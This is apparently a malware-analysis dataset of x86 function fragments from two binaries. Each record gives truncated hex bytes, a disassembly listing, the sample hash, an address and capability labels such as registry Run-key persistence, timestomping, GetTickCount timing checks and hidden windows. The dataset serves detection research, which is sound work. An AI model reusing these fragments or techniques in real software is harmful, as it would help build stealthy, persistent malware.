6aff68dba4400064a100000000506489250000000081ec10020000535556578d4c2410e8b8d7ffff33ed556aff5568a8de400089ac2438020000896c242ce80de3ffff6a016a015568b8e34000e81eedffff8b1d80b0400083c42068e8030000ffd36a01e817f6ffff83c4048d44242068ff00000050ff1564b0400055e84edaffff83c40483f8148d542420bf4cde40007d05bf40de400083c9ff33c0f2aef7...
[ "push 0xffffffffffffffff", "push 0x40a4db", "mov eax, dword fs:[0]", "push eax", "mov dword fs:[0], esp", "sub esp, 0x210", "push ebx", "push ebp", "push esi", "push edi", "lea ecx, [esp + 0x10]", "call fcn.00404310", "xor ebp, ebp", "push ebp", "push 0xffffffffffffffff", "push ebp", ...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x407000
[ "Check for time delay via gettickcount", "Create process on windows", "Delete file", "Delete registry value", "Get common file path", "Persist via run registry key", "Read file on windows", "Set file attributes", "Set registry value", "Timestomp file", "Write and execute a file", "Write file o...
81ec9c060000535556578bbc24b006000033db3bfb895c2418895c242c74366a5c57ff1598b2400083c40885c0742683c9ff33c0f2aef7d12bf98d94241c0200008bc18bf78bfac1e902f3a58bc883e103f3a4eb148d8c241c02000068ff0000005153ff1550b040008d94241c0200006864d1400052ff15b4b240008be883c4083beb896c24140f84520b00008b8424b40600003bc37402891883c9ffbfbcde...
[ "sub esp, 0x69c", "push ebx", "push ebp", "push esi", "push edi", "mov edi, dword [esp + 0x6b0]", "xor ebx, ebx", "cmp edi, ebx", "mov dword [esp + 0x18], ebx", "mov dword [esp + 0x2c], ebx", "je 0x407055", "push 0x5c", "push edi", "call dword [sym.imp.MSVCRT.dll_strchr]", "add esp, 8", ...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x408520
[ "Create process on windows", "Hide graphical window", "Query or enumerate registry value" ]
81ec3c02000053555657b908000000be1ce140008dbc244801000033c0f3a5a4b9080000008dbc2469010000f3abb909000000bef4e040008dbc248901000033dbf3a566a5b9060000008dbc24af010000f3ab66abaab909000000bed0e040008dbc24ca01000033c0f3a5b9070000008dbc24ee010000f3abaab90a000000bea4e040008dbc240b02000033c0f3a5a4b9060000008dbc2434020000f3aba0b8...
[ "sub esp, 0x23c", "push ebx", "push ebp", "push esi", "push edi", "mov ecx, 8", "mov esi, 0x40e11c", "lea edi, [esp + 0x148]", "xor eax, eax", "rep movsd dword es:[edi], dword [esi]", "movsb byte es:[edi], byte [esi]", "mov ecx, 8", "lea edi, [esp + 0x169]", "rep stosd dword es:[edi], eax"...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x408f30
[ "Create process on windows", "Delete file" ]
6aff6826a5400064a100000000506489250000000081ec70020000535556578d4c2424e8589dffff33f68d4c241889b42488020000e8a6b3ffff897424108bb424900200006a2e56c684249002000001ff1598b2400083c40885c00f84280200008bac2494020000807d00000f84170200008bbc2498020000803f000f84070200008b1d88b240006865d540008d84248401000068a0de400050ffd383c40c8d...
[ "push 0xffffffffffffffff", "push 0x40a526", "mov eax, dword fs:[0]", "push eax", "mov dword fs:[0], esp", "sub esp, 0x270", "push ebx", "push ebp", "push esi", "push edi", "lea ecx, [esp + 0x24]", "call fcn.00402cb0", "xor esi, esi", "lea ecx, [esp + 0x18]", "mov dword [esp + 0x288], esi...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x409200
[ "Create process on windows" ]
6aff683ba5400064a100000000506489250000000081ec5001000055568d4c2408e8eab0ffff33f68d4c24085656683f000f0056566865d54000680200008089b4247c01000033ede8b3b1ffff85c07573538b1d88b24000578b3dc4b24000568d4424206888de400050ffd383c40c8d4c241c8d5424606a0051528d4c241ce87cb2ffff85c0752b5050508d44246c50e8ebbbffff83c41085c075176a05508d...
[ "push 0xffffffffffffffff", "push 0x40a53b", "mov eax, dword fs:[0]", "push eax", "mov dword fs:[0], esp", "sub esp, 0x150", "push ebp", "push esi", "lea ecx, [esp + 8]", "call fcn.00404310", "xor esi, esi", "lea ecx, [esp + 8]", "push esi", "push esi", "push 0xf003f", "push esi", "pu...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x409400
[ "Get graphical window text" ]
8b44240c8b4c240881ec00010000c60000c60100535556578bbc241401000057ff15e8b2400085c00f84200300008d54241068ff0000005257ff15dcb2400085c00f8407030000be30e040008d4424108a108a1e8aca3ad3751e84c974168a50018a5e018aca3ad3750e83c00283c60284c975dc33c0eb051bc083d8ff85c00f85c90200008b35d0b24000506830e040005057ffd685c0740e6a006830e04000...
[ "mov eax, dword [esp + 0xc]", "mov ecx, dword [esp + 8]", "sub esp, 0x100", "mov byte [eax], 0", "mov byte [ecx], 0", "push ebx", "push ebp", "push esi", "push edi", "mov edi, dword [esp + 0x114]", "push edi", "call dword [sym.imp.USER32.dll_IsWindowVisible]", "test eax, eax", "je 0x40974e...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x409770
[ "Get graphical window text" ]
81ecd40d0000535556578bbc24ec0d0000c74424100000000085ff742383c9ff33c0f2aef7d12bf98d5424288bc18bf78bfac1e902f3a58bc883e103f3a4eb128d4c242868ff000000516a00ff1550b040008bac24e80d000055ff15e8b2400085c00f848d0400008d54242852e81eb8ffff83c40485c00f84780400008b35b8b240008d4424286a5c50ffd683c40885c00f845e0400008d4c24286a5c51ffd6...
[ "sub esp, 0xdd4", "push ebx", "push ebp", "push esi", "push edi", "mov edi, dword [esp + 0xdec]", "mov dword [esp + 0x10], 0", "test edi, edi", "je 0x4097b0", "or ecx, 0xffffffff", "xor eax, eax", "repne scasb al, byte es:[edi]", "not ecx", "sub edi, ecx", "lea edx, [esp + 0x28]", "mov...
005f618029ed5d8a5c1078f38618936ea7aa1ce290179e52a2325f1644c96189
0x409e20
[ "Get common file path", "Move file" ]
81ec000200008d44240068ff00000050ff1564b0400085c00f848d00000053568d4c240857518d9424100100006844e2400052ff1588b24000bf3ce2400083c9ff33c083c40cf2aef7d12bf98d54240c8bf78bd98bfa83c9fff2ae8bcb4fc1e902f3a58b8424100200008bcb83e103f3a45f5e85c05b741d8d8424000100008d4c24005051ff154cb2400083c40881c400020000c38d5424008d842400010000...
[ "sub esp, 0x200", "lea eax, [esp]", "push 0xff", "push eax", "call dword [sym.imp.KERNEL32.dll_GetWindowsDirectoryA]", "test eax, eax", "je 0x409ecb", "push ebx", "push esi", "lea ecx, [esp + 8]", "push edi", "push ecx", "lea edx, [esp + 0x110]", "push 0x40e244", "push edx", "call dwor...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x405d20
[ "Contain obfuscated stackstrings" ]
558bec6aff68bd58440064a1000000005081ec280100005657a10070460033c5508d45f464a3000000008bf9897dccc70700000000c7470400000000c7470800000000c745fc00000000c7470c32000000c6471000833de0894600000f85a50d00006a0733c0c745e40700000068b4c944008d4dd0c745e000000000668945d0e80bf4ffffc745e8000000008d45d0c645fc0150e8576500005083c01050518d...
[ "push ebp", "mov ebp, esp", "push 0xffffffffffffffff", "push 0x4458bd", "mov eax, dword fs:[0]", "push eax", "sub esp, 0x128", "push esi", "push edi", "mov eax, dword [section..data]", "xor eax, ebp", "push eax", "lea eax, [ebp - 0xc]", "mov dword fs:[0], eax", "mov edi, ecx", "mov dwo...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x409450
[ "Check if file exists", "Get file attributes" ]
8379140872028b0951ff1510c1440083f8ff7407a8107403b001c332c0c3
[ "cmp dword [ecx + 0x14], 8", "jb 0x409458", "mov ecx, dword [ecx]", "push ecx", "call dword [sym.imp.KERNEL32.dll_GetFileAttributesW]", "cmp eax, 0xffffffff", "je 0x40946b", "test al, 0x10", "je 0x40946b", "mov al, 1", "ret", "xor al, al", "ret" ]
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x40d7a0
[ "Get memory capacity" ]
558bec83ec48a10070460033c58945fc8b410483f802744f83f801744a8d45b8c745b84000000050ff1564c044008b4dc08b45c40facc114c1e81485c00f85be00000081f9002200000f87b20000005051e8ca13030083c4088b4dfc33cde8cd6c03008be55dc38d45b8c745b84000000050ff1564c044008b4dc08b45c40facc114c1e81485c0757881f900220000777085c0755981f9001c0000775185c075...
[ "push ebp", "mov ebp, esp", "sub esp, 0x48", "mov eax, dword [section..data]", "xor eax, ebp", "mov dword [ebp - 4], eax", "mov eax, dword [ecx + 4]", "cmp eax, 2", "je 0x40d807", "cmp eax, 1", "je 0x40d807", "lea eax, [ebp - 0x48]", "mov dword [ebp - 0x48], 0x40", "push eax", "call dwor...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x40db70
[ "Get memory capacity" ]
558bec83ec50a10070460033c58945f88b4508535657837814088bfa8bd972028b0050ff1504c344008bf083c40481fe0001000072618d45b4c745b00020000050c745b440000000ff1564c044008b4dbc8d55f48b45c00facc114c1e81481f9002000008d45b0894df40f4ec23b3077268b0b8d45f45068300245008975f4e84ce0ffffb0015f5e5b8b4df833cde8cd6803008be55dc36a106840e844008bcf...
[ "push ebp", "mov ebp, esp", "sub esp, 0x50", "mov eax, dword [section..data]", "xor eax, ebp", "mov dword [ebp - 8], eax", "mov eax, dword [ebp + 8]", "push ebx", "push esi", "push edi", "cmp dword [eax + 0x14], 8", "mov edi, edx", "mov ebx, ecx", "jb 0x40db92", "mov eax, dword [eax]", ...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x40ff40
[ "Check mutex on windows" ]
558bec6aff68f165440064a1000000005081ece0020000a10070460033c58945ec535657508d45f464a3000000008b45080f57c0660fd645e0c745e8000000008945c4c745e000000000c745e400000000c745e800000000b9108a4600c745fc00000000e8176f020083ec188bc4c70054eb44008d4de0894804b9108a4600894010c645fc00e8f55202008b5de433d28b7de08bc38b352cc344002bc78955d8...
[ "push ebp", "mov ebp, esp", "push 0xffffffffffffffff", "push 0x4465f1", "mov eax, dword fs:[0]", "push eax", "sub esp, 0x2e0", "mov eax, dword [section..data]", "xor eax, ebp", "mov dword [ebp - 0x14], eax", "push ebx", "push esi", "push edi", "push eax", "lea eax, [ebp - 0xc]", "mov d...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x410a50
[ "Check mutex on windows" ]
558bec6aff682367440064a1000000005081ece4010000a10070460033c58945f0535657508d45f464a3000000008b4d0cb8abaaaa2a8b7d0833db894d94897d988b318b49042bce895dacf7e9c1fa028bc2c1e81f03c20f84970600008b3d2cc3440033c9894d9c3bc30f86c2060000837c3114088d043172028b0050ff1504c3440083c4048945a08d886179feff81f96079fe000f96c184c974438d8d64ff...
[ "push ebp", "mov ebp, esp", "push 0xffffffffffffffff", "push 0x446723", "mov eax, dword fs:[0]", "push eax", "sub esp, 0x1e4", "mov eax, dword [section..data]", "xor eax, ebp", "mov dword [ebp - 0x10], eax", "push ebx", "push esi", "push edi", "push eax", "lea eax, [ebp - 0xc]", "mov d...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x411190
[ "Check mutex on windows" ]
558bec8b450883ec20538b5d0c56578b388b40042bc7c1f8063bd80f8dc60100008b75188bd3c1e20689550c8d642400ff343a8bcee8f641020084c0740d8b4d0cc744393c03000000eb1c8b450c8bceff3438e8784202008b4d0c84c07408c744393c04000000807d10008b04398bf0740881ce00000001eb0e807d140074088bf081ce00000005508d45e4c744393c000000008b4d1850e863390200837814...
[ "push ebp", "mov ebp, esp", "mov eax, dword [ebp + 8]", "sub esp, 0x20", "push ebx", "mov ebx, dword [ebp + 0xc]", "push esi", "push edi", "mov edi, dword [eax]", "mov eax, dword [eax + 4]", "sub eax, edi", "sar eax, 6", "cmp ebx, eax", "jge 0x411377", "mov esi, dword [ebp + 0x18]", "m...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x414e80
[ "Write file on windows" ]
558bec83e4f86aff68c86d440064a1000000005083ec30a10070460033c489442428535657a10070460033c4508d44244064a3000000008bf18b5d0883fbff750733c0e9870100008b46208b0885c974228b56308b3a8d040f3bc873168d47ff89028b4e208b118d42018901881ae95a010000837e5000750883c8ffe94e0100008b460c8b088d46443bc87510ff763c8b46388bce5050ff15e8c14400837e40...
[ "push ebp", "mov ebp, esp", "and esp, 0xfffffff8", "push 0xffffffffffffffff", "push 0x446dc8", "mov eax, dword fs:[0]", "push eax", "sub esp, 0x30", "mov eax, dword [section..data]", "xor eax, esp", "mov dword [esp + 0x28], eax", "push ebx", "push esi", "push edi", "mov eax, dword [secti...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x415ee0
[ "Write file on windows" ]
558bec83e4f86aff68586f440064a1000000005083ec28a10070460033c489442420535657a10070460033c4508d44243864a3000000008bf1837e40000f84ee000000807e45000f84e40000008b066affff500c83f8ff750732c0e9d300000083ec088d4c2420e8844e0000c7442440000000008d7e488b5c242c8d442414508b44242c8d54241c83fb108d4c241c0f434c241c0f4354241c03c250518b4e40...
[ "push ebp", "mov ebp, esp", "and esp, 0xfffffff8", "push 0xffffffffffffffff", "push 0x446f58", "mov eax, dword fs:[0]", "push eax", "sub esp, 0x28", "mov eax, dword [section..data]", "xor eax, esp", "mov dword [esp + 0x20], eax", "push ebx", "push esi", "push edi", "mov eax, dword [secti...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x41baf0
[ "Enumerate files on windows", "Enumerate files recursively" ]
558bec6aff68a773440064a1000000005081ec0c030000a10070460033c58945f0535657508d45f464a3000000008bc2898504fdffff8bf989bd24fdffff50e80c91000083c404c7458c0700000033c0c74588000000008d8d78ffffff66898578ffffff6aff5057e8d392feff6a0468bc0e45008d8d78ffffffc745fc00000000e81a83feff837d8c088d8d28fdffff8d8578ffffff0f438578ffffff5150ff...
[ "push ebp", "mov ebp, esp", "push 0xffffffffffffffff", "push 0x4473a7", "mov eax, dword fs:[0]", "push eax", "sub esp, 0x30c", "mov eax, dword [section..data]", "xor eax, ebp", "mov dword [ebp - 0x10], eax", "push ebx", "push esi", "push edi", "push eax", "lea eax, [ebp - 0xc]", "mov d...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x41f060
[ "Get number of processors" ]
558bec6aff688a77440064a100000000505156a10070460033c5508d45f464a3000000008bf18975f0c7461000000000c745fc0000000033c0c7462c07000000c746280000000066894618c746440f00000089464088463083ec08c645fc0289464889464ce8060600008946488d4650c645fc036a0250ff1528c2440083c40885c0740a50ff1524c2440083c4048d4654c645fc0450ff1540c2440083c40485...
[ "push ebp", "mov ebp, esp", "push 0xffffffffffffffff", "push 0x44778a", "mov eax, dword fs:[0]", "push eax", "push ecx", "push esi", "mov eax, dword [section..data]", "xor eax, ebp", "push eax", "lea eax, [ebp - 0xc]", "mov dword fs:[0], eax", "mov esi, ecx", "mov dword [ebp - 0x10], esi...
0086498d0fcd5fc1246d4575ad4278654ede09e92b73b20b7c9e6dca6b651034
0x4208a0
[ "Get mac address on windows" ]
558bec6aff68db79440064a1000000005081ec40020000a10070460033c58945ec535657508d45f464a3000000008bd9e86bfaffff8b350cc044008d85d0fdffff506a00c785d0fdffff00000000ffd685c0740583f86f752fffb5d0fdffff6a40ff151cc044008bf889bdccfdffff85ff74158d85d0fdffff5057ffd685c0742557ff1518c0440033c08b4df464890d00000000595f5e5b8b4dec33cde88e3b...
[ "push ebp", "mov ebp, esp", "push 0xffffffffffffffff", "push 0x4479db", "mov eax, dword fs:[0]", "push eax", "sub esp, 0x240", "mov eax, dword [section..data]", "xor eax, ebp", "mov dword [ebp - 0x14], eax", "push ebx", "push esi", "push edi", "push eax", "lea eax, [ebp - 0xc]", "mov d...